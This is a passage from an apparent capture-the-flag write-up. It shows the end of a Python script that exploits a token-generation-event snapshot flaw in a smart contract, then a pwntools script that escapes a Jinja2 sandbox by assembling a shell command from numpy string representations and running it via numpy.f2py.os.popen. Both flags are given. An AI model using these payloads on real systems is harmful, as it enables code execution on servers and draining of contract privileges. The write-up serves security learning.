
    # Step 3: Disable TGE to trigger snapshot
    # This sets isTgePeriod=false, but first sets tgeActivated=true and snapshots supply (TIER_2 supply is 0)
    print("Disabling TGE to snapshot supply...")
    send_tx(setup_contract.functions.enableTge(False))

    # Step 4: Re-enable TGE
    print("Re-enabling TGE...")
    send_tx(setup_contract.functions.enableTge(True))

    # Step 5: Upgrade to Tier 2
    # Requirement: preTGEBalance[msg.sender][2] > preTGESupply[2] (which is 0)
    # _mint updates preTGEBalance if isTgePeriod=true
    print("Upgrading to Tier 2...")
    send_tx(tge_contract.functions.upgrade(2))

    # Step 6: Upgrade to Tier 3
    # Requirement: preTGEBalance[msg.sender][3] > preTGESupply[3] (which is 0)
    print("Upgrading to Tier 3...")
    send_tx(tge_contract.functions.upgrade(3))

    # Verification
    is_solved = setup_contract.functions.isSolved().call()
    print(f"Is Solved: {is_solved}")

if __name__ == "__main__":
    main()

Final Flag

C2C{just_a_warmup_from_someone_who_barely_warms_up}


Misc

Jin

Challenge Overview

  • Category: Misc
  • Goal: Escape the Jinja2 sandbox.

Vulnerability Analysis

The sandbox blocks typical keywords but exposes numpy. String concatenation via ~ is allowed. Exploit: im construct malicious strings (like /fix help) piece-by-piece using the string representations of numpy objects (e.g., numpy.fix, numpy.typing) and concatenating them. then im execute the payload to read the flag.

# pwntool solving app.py simple
from pwn import *

HOST = 'challenges.1pc.tf'
PORT = 37429

p = remote(HOST, PORT)
p.recvuntil(b'>>> ')
content = b"""{%set x= numpy.fix~numpy.typing~dict(help=1)%}{{x}}"""
p.sendline(content)
result = p.recvline().decode()
print(result)
p = remote(HOST, PORT)
p.recvuntil(b'>>> ')
payload = f"x[{result.index('/')}]~x[{result.index('fix ')}:{result.index('fix ')+4}]~x[{result.index('help')}:{result.index('help')+4}]"

content = b"{%set x= numpy.fix~numpy.typing~dict(help=1)%}{{numpy.f2py.os.popen("+payload.encode()+b").read()}}"
print(content)
p.sendline(content)
print(p.recvline().decode())

Final Flag

C2C{damnnn_i_love_numpy_6447e4b64e5e}